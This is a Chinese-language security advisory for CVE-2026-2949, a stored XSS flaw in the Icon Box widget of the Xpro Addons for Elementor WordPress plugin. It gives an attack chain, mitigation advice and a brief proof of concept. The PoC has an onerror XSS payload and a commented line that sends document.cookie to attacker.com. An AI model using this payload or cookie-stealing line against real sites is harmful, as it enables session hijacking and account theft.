CVE-2026-2949 CVSS 6.4 中危

CVE-2026-2949 WordPress插件存储型XSS漏洞

披露日期: 2026-04-04

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-2949

漏洞类型

存储型跨站脚本攻击

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Xpro Addons — 140+ Widgets for Elementor

漏洞概述

WordPress插件Xpro Addons for Elementor在1.4.24及以下版本中，由于Icon Box组件缺乏足够的输入清理和输出转义，存在存储型跨站脚本（XSS）漏洞。具有贡献者及以上权限的认证攻击者可利用此漏洞在页面中注入恶意脚本，当用户访问受影响页面时触发执行。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。其根本原因在于WordPress插件“Xpro Addons — 140+ Widgets for Elementor”的Icon Box组件在后端数据处理时，缺乏对用户提交数据的严格输入清理和输出转义机制。攻击者首先需要获取一个具有贡献者或更高权限的账户。随后，在利用Elementor编辑页面时，攻击者可以向Icon Box小部件的文本字段中注入恶意的JavaScript代码或HTML标签。由于服务端未对特殊字符进行转义，这些恶意载荷会被直接存储到数据库中。当任何用户访问该被篡改的页面时，浏览器会解析并执行其中的恶意脚本。这允许攻击者窃取用户的Session ID、Cookie等敏感信息，甚至利用管理员权限进一步接管网站服务器。

攻击链分析

STEP 1

侦察与权限获取

攻击者识别目标网站使用WordPress及受影响插件，并通过弱口令猜测或社会工程学获取一个具有贡献者（Contributor）及以上权限的账户。

STEP 2

载荷注入

攻击者登录后台，使用Elementor编辑器编辑页面，添加Icon Box小部件，并在其输入字段中注入恶意的JavaScript代码（如<img onerror=...>）。

STEP 3

存储与持久化

由于插件缺乏输出转义，恶意脚本被原样保存到WordPress数据库中，并附着在发布的页面上。

STEP 4

触发与执行

当普通用户或管理员访问该被篡改的页面时，浏览器解析HTML并执行攻击者注入的脚本。

STEP 5

会话劫持

脚本在受害者浏览器中运行，窃取Session Cookie或执行其他恶意操作，导致账户被盗取。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for CVE-2026-2949: Stored XSS in Icon Box Widget
Author: Security Analyst
-->

<!-- Payload to inject into the Icon Box widget title/content -->
<div class="xpro-icon-box-widget">
  <h3><img src=x onerror=alert('XSS_CVE-2026-2949')></h3>
  <p>Malicious content stored via Contributor role.</p>
</div>

<script>
  // This block executes when a user views the compromised page
  console.log("Stored XSS Triggered");
  // Example: Stealing cookies
  // fetch('http://attacker.com/?c=' + document.cookie);
</script>

影响范围

Xpro Addons — 140+ Widgets for Elementor <= 1.4.24

防御指南

临时缓解措施

如果无法立即升级插件，建议暂时禁用Xpro Addons插件中的Icon Box小部件功能，或者完全停用该插件直至应用补丁。同时，应严格审查网站用户权限，仅向必要人员提供内容发布权限，并加强对网站前端输出的安全审计。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表